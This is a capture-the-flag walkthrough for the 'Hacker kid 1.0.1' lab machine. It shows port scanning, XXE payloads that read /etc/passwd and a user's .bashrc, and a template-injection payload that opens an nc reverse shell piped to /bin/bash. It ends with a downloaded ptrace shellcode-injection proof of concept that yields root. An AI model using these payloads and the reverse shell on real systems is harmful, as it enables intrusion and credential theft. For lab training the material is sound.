HackMyVm Hacker kid: 1.0.1 Walkthrough

https://www.vulnhub.com/entry/hacker-kid-101,719/

Very good machine, learn some new stuff.

Scan ports, port 53 is interesting.

 nmap -sV -sC -p- 192.168.33.144  -oN ports.log        
 ...
 PORT     STATE SERVICE VERSION
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Scan port 80.

 ~ gobuster dir -u http://192.168.33.144 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
 403,404,500 --wildcard   -o 80.log
 ...
 ===============================================================
 /images               (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
 /index.php            (Status: 200) [Size: 3597]                                    
 /css                  (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]   
 /form.html            (Status: 200) [Size: 10219]                                   
 /app.html             (Status: 200) [Size: 8048]                                    
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]

Found hints in index.php source code.

 <div class="container py-5">
   <h1>Thanks</h1>
 
  TO DO: Use a GET parameter page_no  to view pages.
 -->

Fuzz index.php with page_no.

 ~ seq 1 100 > dic.txt
 ~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ'    -w dic.txt --hh 3654
 ...
 =====================================================================                                   
 000000021:   200        116 L    310 W      3849 Ch     "21" 

Get more info with page_no=21.

 ~ curl 'http://192.168.33.144/index.php?page_no=21'
 <center>
         <font color="red">
 
 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
 <font color="red">
 </center>

Dig another domain name, write it into /etc/hosts.

 ~ dig @192.168.33.144 hackers.blackhat.local                                                             ...
 ;; AUTHORITY SECTION:
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
 ...

Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.

 ~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
 ]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>' 
 ...
 saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 bind:x:126:133::/var/cache/bind:/usr/sbin/nologin

Read bachrc file with base64.

 ~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!

Decode base64. Get password of port 9999, but should login with name "saket".

 #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"

Login port 9999.

Input param "name", get output in webpage.

Enter shell code, get reverse shell through nc, then spawn a new full shell.

 {%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}

Getcap enum.

 saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /sbin/getcap / -r 2>/dev/null
 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 ...

Reference: https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc

Download the POC and upload to server.

 wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py

Choose a root process to be injected.

 saket@ubuntu:~$ ps aux|grep root
 ...
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start
 ...

Run the POC, then check port.

 saket@ubuntu:~$ python2.7 inject.py 935
 python2.7 inject.py 935
 Instruction Pointer: 0x7fd118b560daL
 Injecting Shellcode at: 0x7fd118b560daL
 Shellcode Injected!!
 Final Instruction Pointer: 0x7fd118b560dcL
 saket@ubuntu:~$ ss -tnlp
 ss -tnlp
 State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
 LISTEN    0         0                   0.0.0.0:5600            0.0.0.0:*                                ...

Connect port 5600 and get root shell.

 ~ nc 192.168.33.144 5600              
 id
 uid=0(root) gid=0(root) groups=0(root)